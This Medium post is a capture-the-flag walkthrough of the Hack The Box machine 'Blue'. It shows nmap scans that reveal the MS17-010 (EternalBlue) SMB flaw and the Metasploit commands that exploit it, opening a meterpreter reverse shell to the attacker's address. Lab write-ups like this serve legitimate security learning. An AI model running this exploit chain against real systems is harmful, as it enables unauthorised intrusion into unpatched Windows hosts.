Open in app

Sign in

Write

Sign in

Hack The Box(HTB)Blue -Walkthrough-

yu1ch1
3 min readSep 5, 2020

Hey guys!Today I’m going to write a walkthrough for Hack The Box.

The targeted machine is Blue.

Blue’s Info Card

When I saw the words “Blue” and “Windows”, it ring a bell.
Let’s proceed for the time being.

01-nmap

Run nmap to scan the machine.

#nmap -sV -sS -Pn -oN blueHTB blue.htb
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.16s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7–10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

It’s good to save it in hosts in advance.

#vi /etc/hosts
10.10.10.40 blue.htb

The scan result show that 139,445 ports are open.Investigate further for vulnerabilities.

#nmap --script vuln blue.htb
part of the result

smb-vuln-ms17–010 is VULNERABLE.
The vulnerability is commonly known as “Eternal Blue”. So the name of this machine is also blue.
Eternal Blue became famous in 2017 when it was used by a ransomware called “WannaCry”. more details

02-msf

Attacks the discovered vulnerabilities.

# msfconsole
msf5 > search ms17-010
parts of the result
msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts blue.htb
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.41
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

The Meterpreter shell has started.
I didn’t understand how to use Meterpreter ,so I had a hard time.
I referred to this page.

meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../..
meterpreter > cd Users
meterpreter > dir

I found an administrator.
The flag was on eash user’s desktop.

Thank you for reading.

Hackthebox
Htb
Walkthrough
Hacking
Writeup

--

--

yu1ch1

Written by yu1ch1

38 Followers

I’m a Japanese high school student.I’m interested in hacking. I will be a super hacker like “Spooky”, who I respect the most. I have to study hacking for that.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams